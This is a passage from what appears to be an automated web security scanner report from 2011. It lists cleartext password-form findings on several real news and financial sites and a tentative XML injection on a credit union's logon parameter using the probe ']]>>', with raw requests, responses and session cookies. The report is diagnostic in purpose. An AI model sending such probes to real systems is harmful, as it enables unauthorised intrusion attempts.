Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=52c21975d801317348f94128ddfa4737; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MrSwBhJGlmZmlobmBubWtVwwUCEGNA%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33840

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.6. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=7e18e83c9fce99cef40adc0b7151471b; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU2s860MjSyNDOzNDQ3MLOuBVwwVf8GaA%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 30617

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

4.7. http://fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:54:33 GMT
Connection: close
Content-Length: 83533
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

4.8. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:02:54 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<div class="pad5"><form method="post" action="/csp/jap/insidejapan/loginok.csp">


<input type="hidden" name="FormPage" value="login">
...[SNIP]...
<td><input class="smalltxt" name="password" type="password" size="10"></td>
...[SNIP]...

4.9. http://ipboard-software.software.informer.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ipboard-software.software.informer.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: ipboard-software.software.informer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 01:02:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 17619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<div>
       <form accept-charset="utf-8" action="/login.php" method="post" id="register">
               <div class="hidden">
...[SNIP]...
</p>
       <input type="password" name="passwd" />
       <p>
...[SNIP]...

4.10. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

4.11. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703779704576073610615364334.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:22 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:37 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=30
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 183840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>

<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

4.12. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:24 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:39 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

4.13. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:24 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:39 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>

<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

4.14. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boston.com
Path:   /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:30 GMT
Server: Apache/2.2.13 (Unix)
Set-Cookie: pathCnt=1; path=/; domain=.boston.com
Accept-Ranges: bytes
Served-By: rebecca
Content-Type: text/html
Connection: close
Set-Cookie: bcpage=0;expires=Fri, 08-Jan-2016 01:06:30 GMT;path=/;domain=boston.com;
Content-Length: 40252

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!-- Need for HL -->
<script language="JavaScript"><!--

var trustedT
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...

4.15. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:32 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=06b1a9ee60ea3411d50706d6b4b05184%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=f857207c09785572124d4877b07e3ed2%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:06:32 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 143217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<br />

<form action="/passport/login.html" method="post">
<input type="hidden" name="pg" value="/greenliving/bluefin-tuna-sells-for-396000.html#comment_form" />
...[SNIP]...
<br/>
<input type="password" id="login_connect-password" class="text_input" name="password" value="password" /><br/>
...[SNIP]...

4.16. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.enewspf.com
Path:   /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1
Host: www.enewspf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
<div class="ja-box-ct clearfix"><form action="http://www.enewspf.com/component/comprofiler/login.html" method="post" id="mod_loginform" style="margin:0px;"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

4.17. http://www.fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:54 GMT
Connection: close
Content-Length: 83551
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

4.18. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macaudailytimes.com.mo
Path:   /times-lab/21109-Tragedy-our-Commons.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1
Host: www.macaudailytimes.com.mo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: VivvoSessionId=3a8696ff4d4a020889d27; path=/; domain=.macaudailytimes.com.mo
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=3a8696ff4d4a020889d27; expires=Fri, 04-Feb-2011 01:16:56 GMT; path=/; domain=.macaudailytimes.com.mo
Connection: close
Content-Type: text/html
Content-Length: 49200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
   <he
...[SNIP]...
</script>
                                   <form id="login_form" action="" method="post">
                                       <input type="hidden" name="SECURITY_TOKEN" value="8107be01ab" />
...[SNIP]...
<div class="formElement">
                                               <input class="text" type="password" name="LOGIN_password" value="" style=" width: 216px;" />
                                           </div>
...[SNIP]...

4.19. http://www.sipc.org/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:20:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</td>
<form name="login" method="post" action="claim/module/login.cfm" target="_blank" onSubmit = "return checkForm(this);"><td width="95" bgcolor="#CBD4CB">
...[SNIP]...
</div>
<input type="Password" name="password" style="width:90px;">
<div style="padding-top:8px;">
...[SNIP]...

5. XML injection  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://myaccounts.navyfcu.org
Path:   /cgi-bin/ifsewwwc

Issue detail

The Logon parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the Logon parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

Request

GET /cgi-bin/ifsewwwc?Logon]]>> HTTP/1.1
Host: myaccounts.navyfcu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:10 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpool-MYACCOUNTS-IFSE_1443=923273738.41733.0000; path=/
Content-Length: 898

<?xml version="1.0" encoding="ISO-8859-1" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19
...[SNIP]...

6. SSL cookie without secure flag set  previous  next
There are 177 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

